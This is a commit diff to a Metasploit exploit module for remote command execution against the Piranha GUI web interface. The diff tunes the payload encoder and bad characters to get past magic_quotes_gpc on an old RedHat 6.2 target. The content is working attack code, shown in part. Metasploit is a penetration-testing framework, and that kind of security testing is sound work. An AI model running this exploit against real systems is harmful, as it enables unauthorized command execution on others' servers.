clarify limitations, update to use PrintfUtil encoder

git-svn-id: file:///home/svn/framework3/trunk@9614 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/linux/http/piranha_passwd_exec.rb

@@ -49,17 +49,23 @@ class Metasploit3 < Msf::Exploit::Remote
 				{
 					'Space'       => 1024,
 					'DisableNops' => true,
+					'BadChars'    => "\x22\x27", # magic_quotes_gpc
+					# NOTE: We specify our own custom-ish encoder here.
+					# This is due to lots of incompatabilities with the old RedHat 6.2 test system.
+					# 1. inetd exists, but the syntax is no good.
+					# 2. telnet exists
+					# 3. /dev/tcp doesn't work.
+					# 4. PHP's magic_quotes_gpc is on by default, causing escaping of single/double quotes.
+					# 5. echo -ne doesn't work
+					'EncoderType' => Msf::Encoder::Type::PrintfUtil,
 					'Compat'      =>
 						{
 							'PayloadType' => 'cmd',
-							'RequiredCmd' => 'generic',
-							# inetd works, but not on RH6.2 syntax wise. telnet also, but /dev/tcp not found.
-							# others use single quotes which apache/bash/htpasswd escapes (\) and breaks. sigh!
 						}
 				},
 			'Targets'        =>
 				[
-					[ 'Automatic (piranha-gui-0.4.12-1.i386.rpm)', { }]
+					[ 'Automatic (piranha-gui-0.4.12-1.i386.rpm)', { } ]
 				],
 			'DefaultTarget' => 0))
 
@@ -78,10 +84,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		res = send_request_raw({
 				'uri' => str,
 				'method' => 'GET',
-				'headers' => {
+				'headers' =>
-					'content-type' => 'application/x-www-form-urlencoded',
+					{
+						'content-type' => 'application/x-www-form-urlencoded',
 					},
-		}, 3)
+			}, 3)
 
 		if (res.code == 401)
 			print_error("401 Authorization Required! Our BasicAuthUser and BasicAuthPass credentials not accepted!")
@@ -92,4 +99,3 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 end
-